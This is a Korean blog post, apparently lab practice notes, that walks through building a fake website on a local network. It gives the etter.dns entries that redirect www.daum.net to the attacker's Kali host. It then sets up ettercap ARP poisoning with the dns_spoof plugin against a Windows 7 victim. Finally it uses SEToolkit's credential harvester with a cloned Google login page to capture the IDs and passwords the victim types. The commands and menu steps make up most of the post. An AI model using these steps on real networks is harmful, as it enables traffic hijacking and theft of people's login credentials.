- Fake Site 구성
지금까지 실습은 192.168.27.50 으로 접속하여 실습하였다.
그러나 일반 사용자는 이렇게 IP를 치고 접속하지 않는다. 도메인을 입력해도 Fake Site가 나오도록 구성한다.
- DNS Spoofing / ARP Spoofing ettercap
- Fake Web Site SEToolkit
- 사용 시스템
KaliLinux
Windows 7
- DNS Spoofing / ARP Spoofing
- dns 설정
# cd /etc/ettercap
# vi etter.dns
|
############################################## # (1) Sfecific Configuration # - DNS Spoofing Test www.daum.net A 192.168.27.50 *.daum.net A 192.168.27.50 www.daum.net PTR 192.168.27.50 |
|
> 추가
# ettercap -G &
Sniff > Unified sniffing > eth1
Host > Scan for hosts
Host > Hosts list
192.168.27.100 target 1 /* f/w */
192.168.27.202 target 2 /* windows 7*/
Mitim > ARP poisoning > Sniff remote connections > 확인
Plugins > Manage the Plugins > dns_spoof 클릭 * 확인
Start > Start sniffing
- Fake Site 설정
# setoolkit
|
Select from the menu: 1) Social-Engineering Attacks 2) Penetration Testing (Fast-Track) 3) Third Party Modules 4) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set> 1 Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) SMS Spoofing Attack Vector 11) Third Party Modules 99) Return back to the main menu. set> 2 1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Web Jacking Attack Method 6) Multi-Attack Web Method 7) Full Screen Attack Method 8) HTA Attack Method 99) Return to Main Menu set:webattack>3 1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu set:webattack>1 [-] Credential harvester will allow you to utilize the clone capabilities within SET [-] to harvest credentials or parameters from a website as well as place them into a report [-] This option is used for what IP the server will POST to. [-] If you're using an external IP, use your external IP for this set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.17.50]:192.168.27.50 1. Java Required 2. Google 3. Facebook 4. Twitter 5. Yahoo set:webattack> Select a template:2 |
|
(win7)
cmd > ipconfig /flushdns
-> dns 캐쉬를 삭제합니다.
www.daum.net
> daum.net 으로 들어갔지만 kali에서 설정한 google 템플릿이 나옵니다.
> harvester 설정을 했기때문에 ID와 PASS 를 입력하면 Kali 에서 나타납니다.
'Security > 정보 수집' 카테고리의 다른 글
| Password Attack ( xhydra ) (0) | 2017.11.14 |
|---|---|
| Password Crack ( John The Ripper) (0) | 2017.11.13 |
| Fake Update Site 구축 (0) | 2017.11.13 |
| BeEF 와 MSF 같이 사용하기 (0) | 2017.11.13 |
| 웹 브라우저 해킹 ( BeEF XSS ) (0) | 2017.11.13 |
